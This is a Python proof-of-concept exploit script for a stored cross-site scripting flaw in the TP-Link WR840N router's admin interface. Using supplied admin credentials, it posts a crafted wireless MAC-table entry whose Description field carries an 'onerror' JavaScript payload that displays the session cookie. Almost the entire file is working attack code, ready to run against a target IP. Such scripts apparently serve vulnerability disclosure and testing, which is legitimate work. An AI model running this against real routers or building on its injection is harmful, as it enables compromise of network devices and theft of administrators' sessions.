#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Samir Sanchez Garnica and Luis Jacome Valencia
# Description: This script exploits a vulnerability (XSS) in the TPLink WR840N router, using a field for injecting javascript code.

import requests
import base64
import random
import argparse


class ExploitXSS():
    def __init__(self, ip, username, password):
        self.target = ip
        self.username = username
        self.password = password
        self.session = requests.Session()
        self.url = "http://" + self.target + "/cgi?3"
    
    def base64_encode(self, s):
        msg_bytes = s.encode('ascii')
        return base64.b64encode(msg_bytes)
    
    def generate_macaddress(self):
        self.mac = [ 0x00, 0x16, 0x3e,
        random.randint(0x00, 0x7f),
        random.randint(0x00, 0xff),
        random.randint(0x00, 0xff) ]
        return ':'.join(map(lambda x: "%02x" % x, self.mac))

    def exploit(self):
        self.cookies = { 'Authorization' : 'Basic ' + self.base64_encode(self.username + ":" + self.password).decode('ascii') }
        self.params = (
            ('3', ''),
        )

        self.payload = '[LAN_WLAN_MACTABLEENTRY#0,0,0,0,0,0#1,1,0,0,0,0]0,4\r\nEnabled=1\r\nDescription=<img src/onerror=prompt(document.cookie)>\r\nMACAddress={}\r\nHostName=wlan0\r\n'.format(self.generate_macaddress())

        self.headers = {
            'Host': self.target,
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0',
            'Accept': '*/*',
            'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'text/plain',
            'Content-Length': str(len(self.payload)),
            'Origin': 'http://'+str(self.target),
            'Referer': 'http://'+str(self.target)+'/mainFrame.htm'
        }


        self.response = self.session.post(self.url, headers=self.headers, params=self.params, cookies=self.cookies, data=self.payload, verify=False)
        if '71014' in self.response.text:
            print("[+] Exploit success!")

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--username", dest="username", help="Enter the administrator user of the router", required=True)
    parser.add_argument("--password", dest="password", help="Enter the admin password of the router", required=True)
    parser.add_argument("--target", dest="target", help="Enter router ip address", required=True)

    args = parser.parse_args()

    if args.username and args.password and args.target:
        exploit = ExploitXSS(args.target, args.username, args.password)
        exploit.exploit()

if __name__ == "__main__":
    print("[+] Exploiting XSS by patience....")
    main()
    

#NB. Original query string below. It seems impossible to parse and
#reproduce query strings 100% accurately so the one below is given
#in case the reproduced version is not "correct".
# response = requests.post('http://192.168.0.1/cgi?3', headers=headers, cookies=cookies, data=data, verify=False)